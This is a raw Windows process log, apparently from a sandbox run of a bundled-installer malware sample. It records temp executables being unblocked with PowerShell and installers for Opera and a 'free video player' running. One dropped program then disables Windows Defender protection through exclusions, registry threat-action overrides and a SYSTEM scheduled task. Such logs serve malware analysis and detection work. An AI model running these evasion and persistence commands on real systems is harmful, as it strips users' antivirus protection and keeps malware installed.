C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2508
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2576
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2260
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2304
C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe
C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe
C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe
C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe /sid=3 /pid=1090
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2376
C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp" /SL5="$3033E,4415326,54272,C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2212
C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe
C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2472
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2520
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --silent --allusers=0 --server-tracking-blob=MWQ2MDgwMGU2ZWQwM2MwN2IxZThmNjYyM2ViOGRmYTA5OTgyY2M3OWJjODE3ZWQxYjFlZDE4N2FkMjEwZmJjYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY4ODkuNzk4NiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiY2M5NjA1YjMtNGMwYS00ZTYyLWEzNjItZTJkZmM2ZGRmMjA0In0=
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2060
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2d4,0x304,0x6f6db1f4,0x6f6db200,0x6f6db20c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2160
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2428
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1456 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051500" --session-guid=2aaf9e2d-2803-4c30-aa74-1618091f706b --server-tracking-blob=MDY0YzFlMjAzMDIxMzgyZGRkMzA4NThjOTBmNGFiNDhhZjBiMTNhZjU3MjgyYTY3YmZlNWQ5ZmQ2Mzg5MDI2Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjg4OS43OTg2IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiJjYzk2MDViMy00YzBhLTRlNjItYTM2Mi1lMmRmYzZkZGYyMDQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C404000000000000
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x304,0x308,0x30c,0x2d4,0x310,0x6c80b1f4,0x6c80b200,0x6c80b20c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2524
C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe
C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2524
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2540
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2336
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe\" z0 /badidB 757674 /S" /V1 /F
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x1529f88,0x1529f94,0x1529fa0
C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe
C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe z0 /badidB 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
